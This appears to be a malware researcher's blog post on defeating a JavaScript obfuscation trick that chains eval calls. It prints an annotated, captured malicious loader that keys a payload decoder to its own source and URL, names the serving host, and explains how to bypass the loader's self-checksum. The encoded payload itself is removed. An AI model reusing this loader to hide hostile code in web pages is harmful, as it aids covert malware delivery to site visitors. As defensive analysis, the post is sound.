de-obfuscate javascript (2)

Looks like the criminals are trying to defeat our de-obfuscation technique by chaining a series of eval(str) calls.

An example of obfuscated code (http://bdydcketn.com/cgi-bin/index.cgi?mentat):
// Malicious loader exactly as captured; the run-together statements, stray
// semicolons and mid-identifier line breaks are the sample's own obfuscation
// (and the page's wrapping) and are deliberately left untouched.
// What it does, in order (names are the sample's randomised identifiers):
//   1. ee7T2wrIu := own source (arguments.callee.toString()) + location.href,
//      with every non-word character stripped (/\W/g) and then upper-cased.
//   2. Builds a 256-entry table and runs a table-driven CRC-32 over ee7T2wrIu:
//      Bk3R2fKL0 = 2*1994146192 = 0xEDB88320 (the reflected CRC-32 polynomial),
//      start value and final XOR are MUQMylf7O-1 = 0xFFFFFFFF.
//   3. The CRC, zero-padded to 8 upper-case hex digits, becomes the 8-byte key
//      VI14J51J8 for a byte-wise subtraction cipher over the hex-encoded
//      argument diemU01t1 (the "data removed" payload in the call below).
//   4. eval()s the decoded text; if that throws, the page is sent to "/".
// Analysis notes: the key is derived from the function's own source AND the
// URL it was served from, so a decoder must present both unchanged. Because of
// the \W-strip and toUpperCase in step 1, whitespace and letter case do not
// affect the key (this is why renaming eval to evaL keeps the key intact),
// but adding or removing any word character does. The loops are assembled
// from string fragments and run through eval(str2), eval(str) and eval(str3),
// so a hook on the final eval only sees the payload if those earlier evals
// really execute. str2 and str3 are assigned without var and leak as globals.
function  s838kQA58(diemU01t1){var   p7Ln57Kbh =  location.href;;;var     xbmmRt
KJT   =   arguments.callee;;xbmmRtKJT    =    xbmmRtKJT.toString();;;;var  ee7T2
wrIu   =   xbmmRtKJT +   p7Ln57Kbh;;;var RKYcWmlFe =  "";;;ee7T2wrIu = ee7T2wrIu
.replace(/\W/g, RKYcWmlFe);ee7T2wrIu     =   ee7T2wrIu.toUpperCase();;;;var   MU
QMylf7O = 2147483648;;;;MUQMylf7O =  MUQMylf7O  +    MUQMylf7O;var    lA65Otsc1
// MUQMylf7O is now 2^32; lA65Otsc1 becomes the 256-entry CRC table, zeroed by eval(str2).
= new     Array;;;;str2  =     'f'+'o'+'r'+'('+'var   d7rLYBygF   =     0'+';'+'
d7rLYBygF '+'< 256;   d7rLYBygF++'+')    {lA65Otsc1[d7rLYBygF]     =    0;;;
;}';;;eval(str2);;;;var   MH7FyrT5e     =   1;;;;var     Bk3R2fKL0  = 1994146192
// Bk3R2fKL0 doubles to 0xEDB88320; eval(str) below fills the CRC-32 table
// (the "+= MUQMylf7O" branch maps negative int32 XOR results back to unsigned).
;;;;;Bk3R2fKL0     = Bk3R2fKL0  +     Bk3R2fKL0;;str    =   'f'+'o'+'r'+'(var'+'
d7rLYBygF'+'     =     128'+';'+'  d7rLYBygF;    d7rLYBygF     >>=  1) {MH7F
yrT5e =  MH7FyrT5e  >>>   1   ^     (MH7FyrT5e     &   1 ?   Bk3R2fKL0     :
0);;;;;fo'+'r(v'+'ar     d5XclNudh'+' = 0;    d5XclNudh   <  25'+'6; d5XclNudh
+'+'=  d7rLYBygF     * 2)    {var   XOd766W6o   =  d7rLYBygF   +    d5XclNudh;;
;;;lA65Otsc1[XOd766W6o]    =   lA65Otsc1[d5XclNudh]    ^   MH7FyrT5e;if    (lA65
Otsc1[XOd766W6o] <  0)    {lA65Otsc1[XOd766W6o]     += MUQMylf7O;;;;;}}}';;;;eva
l(str);;;var  OWda8n6v6  =     MUQMylf7O  -    1;;;;var     str   =  'f'+'o'+'r'
// CRC-32 of ee7T2wrIu (init 0xFFFFFFFF, final XOR 0xFFFFFFFF), rendered as
// 8 upper-case hex chars whose char codes become the key array VI14J51J8.
+'('+'var  X0k3x2pOH     =  0;  X0k3x2pOH   <    ee7T2wrIu.length;   X0k3x2pOH++
)  {var    D6N2tFtL6 =     (OWda8n6v6   ^ ee7T2wrIu.charCodeAt(X0k3x2pOH))  &  2
55;;;OWda8n6v6 =     (OWda8n6v6     >>>  8)    ^    lA65Otsc1[D6N2tFtL6];;}OWda8
n6v6     =     OWda8n6v6    ^ (MUQMylf7O   - 1);;;;;if  (OWda8n6v6   <    0)   {
OWda8n6v6     +=   MUQMylf7O;;;;;}'+'OWda8n6v6 =   OWda8n6v6.toString(16).toUppe
rCase();;whi'+'le(OWda8n6v6.length  <    8) {OWda8n6v6   =  "0"    + OWda8n6v6;;
;}var   VI14J51J8   = new  Array;;f'+'o'+'r'+'(var     d7rLYBygF = 0;'+'+   d7rL
YBygF    <'+'    8;   d7rLYBygF++) {VI14J51J8[d7rLYBygF]    =  OWda8n6v6.charCod
e'+'At(d7rLYBygF);;}var dtmv0JxTc =     0;var  ON5WV0w76     =    "";;;';;;;;
// Decode: each hex byte of diemU01t1 minus the current key byte (mod 256),
// key index dtmv0JxTc cycling over the 8 entries; result accumulates in ON5WV0w76.
eval(str);;;;;str3=    'f'+'o'+'r('+'var    d7rLYBygF    =  '+'0;'+' d7rLYBygF
<    '+'diemU01t1.length;     '+'d7rLYBygF +=    2){var  XOd766W6o   =    di
emU01t1.substr(d7rLYBygF,    2);;var    D51Pf8MjH  = parseInt(XOd766W6o,    16);
;var L817eB0l8    =    D51Pf8MjH     -     VI14J51J8[dtmv0JxTc];;;;;if(L817eB0l8
<     0)     {L817eB0l8  =  L817eB0l8    +  256;;;;;}ON5WV0w76  +=   String.fro
mCharCode(L817eB0l8);;;if(dtmv0JxTc    +    1   ==   VI14J51J8.length)   {dtmv0J
xTc    =    0;;;;;}  else     {dtmv0JxTc++;;;}}';;;eval(str3);;var    OPFM7qC4J
// Run the decoded payload; a throw (wrong key, e.g. altered source or URL)
// sets OPFM7qC4J to 1 and the page is redirected to "/" instead.
= 2;;;;try  {;eval(ON5WV0w76);;;}     catch(e) {OPFM7qC4J  =  1;;;}try {if (O
PFM7qC4J     ==   1)  {window.location   =    "/";;;}}     catch(e)  {}}

s838kQA58(‘ data removed ‘)

Using our current technique on this code would not print the argument of the last eval(ON5WV0w76), because the earlier eval(str) calls that build it are never executed.

The function's self-protection is not done too well: it checksums its own source only after stripping non-word characters and upper-casing it, so changing eval(ON5WV0w76) to evaL(ON5WV0w76) leaves the checksum, and therefore the decoding key, unchanged. Then define function evaL(a) {print(a);} in the stub file instead of redefining eval(); the stub still has to supply the original location.href, since the URL is part of the checksum input as well.
